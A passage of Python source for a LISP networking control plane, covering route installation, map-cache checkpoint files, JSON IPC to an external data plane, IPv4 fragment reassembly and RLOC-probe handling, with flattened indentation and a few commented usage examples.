# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
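#
# Illustrative example (hypothetical addresses):
#
#   >>> lisp_install_host_route("10.1.1.1", "192.168.1.254", True)
#
# runs "ip route add 10.1.1.1/32 via 192.168.1.254". Calling it again with
# install=False runs the matching "ip route delete" command, and a next-hop
# of None omits the "via" clause.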
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return
#enddef
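#
# Illustrative example (hypothetical entry): a map-cache entry for EID
# [1000]10.1.0.0/16 with two RLOCs is checkpointed as the line:
#
#   [1000]10.1.0.0/16 rloc 192.168.1.1 1 50, 192.168.2.1 1 50
#
# and a native-forward entry with no RLOCs as:
#
#   [1000]10.2.0.0/16 rloc native-forward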
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
# Write a JSON record to the lisp-ipc-data-plane named socket.
#
def lisp_write_to_dp_socket(entry):
try:
rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_list has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (addr_str not in lisp_rloc_probe_list): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
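#
# Illustrative example (hypothetical entry): a unicast map-cache entry for
# [1000]10.1.0.0/16 with one up RLOC produces a JSON record like:
#
#   { "type" : "map-cache", "opcode" : "add", "eid-prefix" : "10.1.0.0/16",
#     "instance-id" : "1000", "rlocs" : [ { "rloc" : "192.168.1.1",
#     "priority" : "1", "weight" : "50", "port" : "4341" } ] }
#
# with a "keys" array added per RLOC when lisp-crypto keys are present.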
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
# Write record in JSON format. Store encryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the JSON "keys" array for both the ITR encryption side and the ETR
# decryption side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
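#
# Illustrative example (made-up key strings):
#
#   >>> entry = { "type" : "decap-keys", "rloc" : "192.168.1.1" }
#   >>> lisp_build_json_keys(entry, "aa11..", "bb22..", "decrypt-key")
#   {'type': 'decap-keys', 'rloc': '192.168.1.1', 'keys':
#    [{'key-id': '1', 'decrypt-key': 'aa11..', 'icv-key': 'bb22..'}]}
#
# When ekey is None the entry is returned unchanged.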
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write the database-mapping records to the
# ipc-data-plane socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# In the lisp-itr process, write the interface-to-instance-ID records to the
# ipc-data-plane socket.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in list(lisp_myinterfaces.values()):
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return a auth_key{} where the keys from the dictionary array are type
# integers and the values are type string.
#
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
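#
# Illustrative examples (made-up passwords):
#
#   >>> lisp_parse_auth_key("my-password")
#   {0: 'my-password'}
#   >>> lisp_parse_auth_key("[3]my-password")
#   {3: 'my-password'}
#   >>> lisp_parse_auth_key("[1]pw-one[2]pw-two")
#   {1: 'pw-one', 2: 'pw-two'}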
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsulated packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
# Not a fragment, return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
#
# Get key fields from fragment.
#
ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
# Initialized list if first fragment. Indexed by IPv4 Ident.
#
if (ident not in lisp_reassembly_queue):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
# Do not queue the fragment if the first fragment arrived and we determined
# it's not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
# If we did not return, we have all fragments. Now append them. Keep the
# IP header in the first fragment but remove in each other fragment.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
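#
# Reminder on the flags/fragment-offset values tested above: the 16-bit field
# at bytes 6-7 of the IPv4 header carries the DF bit (0x4000), the MF bit
# (0x2000), and a 13-bit offset in 8-byte units. So 0x0000 and 0x4000 mean
# "not a fragment", 0x2000 means "first fragment, more to come", and, for
# example, 0x2005 means "more fragments, data offset 5 * 8 = 40 bytes".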
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<port> or <addr> in lisp_crypto_
# keys_by_rloc_decap{}.
#
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (addr_str in lisp_crypto_keys_by_rloc_decap): return(addr_str)
addr_str = addr.print_address_no_iid()
if (addr_str in lisp_crypto_keys_by_rloc_decap): return(addr_str)
#
# We are at non-NAT based xTR. We need to get the keys from an RTR
# or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
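#
# Illustrative example (hypothetical addresses): with a decap key stored
# under "192.168.1.1:31000", a call with addr 192.168.1.1 and port 4341
# misses the "192.168.1.1:4341" and "192.168.1.1" lookups, then finds the
# port-suffixed entry in the loop above, copies its keys under plain
# "192.168.1.1", and returns that string.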
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (addr in lisp_rloc_probe_list): return(addr)
#
# Have to check the NAT cache to see if the RLOC is translated. If not,
# this is an xTR in public space. We'll have to change this in the future
# so we don't do a full table traversal.
#
for nat_info in list(lisp_nat_state_info.values()):
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
#endif
return(addr)
#endif
return(addr_and_port)
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe.
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe.
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return the source address, source port, and TTL, and position the packet at the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9:10])[0] == 17)
if (udp == False): return([packet, None, None, None])
sport = struct.unpack("H", packet[20:22])[0]
dport = struct.unpack("H", packet[22:24])[0]
is_lisp = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
if (is_lisp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28:29])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28:29])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28:29])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28:29])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is a RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8:9])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if ("entries" not in msg):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if ("eid-prefix" not in msg):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if ("instance-id" not in msg):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if ("rlocs" not in msg):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if ("rloc" not in ipc_rloc): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ("packet-count" not in ipc_rloc) else \
ipc_rloc["packet-count"]
bc = 0 if ("byte-count" not in ipc_rloc) else \
ipc_rloc["byte-count"]
ts = 0 if ("seconds-last-packet" not in ipc_rloc) else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If we are an RTR, we can process the stats directly. If we are an ITR we
# need to send an IPC message to the lisp-etr process.
#
# Variable "msg" is a string and not a byte string. Caller converts.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
#
# Process stats counters in lisp-etr and lisp-rtr processes. Variable 'msg'
# is a dictionary array when the ITR/RTR is processing msg. When an ETR
# is processing it, it recevied a json string from the ITR so it needs
# to convert to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if (key_name not in msg) else msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if (key_name not in msg) else msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if (key_name not in msg) else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a map-request, or store statistics data. The JSON message types
# are "discovery", "restart", "statistics", and "decap-statistics". This
# function dispatches to other functions for the stats and restart types
# but this function processes logic for:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if ("type" not in msg):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
# Process restart message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if ("interface" not in msg):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if ("source-eid" in msg):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if ("dest-eid" in msg):
dest_eid = msg["dest-eid"]
deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
if (deid.is_null()):
lprint("Invalid dest-EID format '{}'".format(dest_eid))
return
#endif
#endif
#
# Do source-EID discovery.
#
# Make sure we have a configured database-mapping entry for this EID.
#
if (seid):
e = green(seid.print_address(), False)
db = lisp_db_for_lookups.lookup_cache(seid, False)
if (db != None):
#
# Check accept policy and if accepted, discover EID by putting
# in discovery cache. ETR will register it.
#
if (db.dynamic_eid_configured()):
interface = lisp_allow_dynamic_eid(device, seid)
if (interface != None and lisp_i_am_itr):
lisp_itr_discover_eid(db, seid, device, interface)
else:
lprint(("Disallow dynamic source-EID {} " + \
"on interface {}").format(e, device))
#endif
#endif
else:
lprint("Punt from non-EID source {}".format(e))
#endif
#endif
#
# Do Map-Request processing on destination.
#
if (deid):
mc = lisp_map_cache_lookup(seid, deid)
if (mc == None or lisp_mr_or_pubsub(mc.action)):
#
# Check if we should rate-limit Map-Request and if not send
# Map-Request.
#
if (lisp_rate_limit_map_request(deid)): return
pubsub = (mc and mc.action == LISP_SEND_PUBSUB_ACTION)
lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
seid, deid, None, pubsub)
else:
e = green(deid.print_address(), False)
lprint("Map-cache entry for {} already exists".format(e))
#endif
#endif
return
#enddef
#
# lisp_ipc_map_cache_entry
#
# Callback from class lisp_cache.walk_cache().
#
def lisp_ipc_map_cache_entry(mc, jdata):
entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
jdata.append(entry)
return([True, jdata])
#enddef
#
# lisp_ipc_walk_map_cache
#
# Walk the entries in lisp_map_cache. Then, for entries with (S,G) state,
# walk the entries in their lisp_mapping.source_cache().
#
def lisp_ipc_walk_map_cache(mc, jdata):
#
# There is only destination state in this map-cache entry.
#
if (mc.group.is_null()): return(lisp_ipc_map_cache_entry(mc, jdata))
if (mc.source_cache == None): return([True, jdata])
#
# There is (source, group) state so walk all sources for this group
# entry.
#
jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
return([True, jdata])
#enddef
#
# lisp_itr_discover_eid
#
# Put dynamic-EID in db.dynamic_eids{} array.
#
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
lisp_ipc_listen_socket):
eid_str = eid.print_address()
if (eid_str in db.dynamic_eids):
db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
return
#endif
#
# Add to list.
#
dyn_eid = lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = routed_interface
dyn_eid.last_packet = lisp_get_timestamp()
dyn_eid.get_timeout(routed_interface)
db.dynamic_eids[eid_str] = dyn_eid
routed = ""
if (input_interface != routed_interface):
routed = ", routed-interface " + routed_interface
#endif
eid_string = green(eid_str, False) + bold(" discovered", False)
lprint("Dynamic-EID {} on interface {}{}, timeout {}".format( \
eid_string,input_interface, routed, dyn_eid.timeout))
#
# Tell ETR process so it can register dynamic-EID.
#
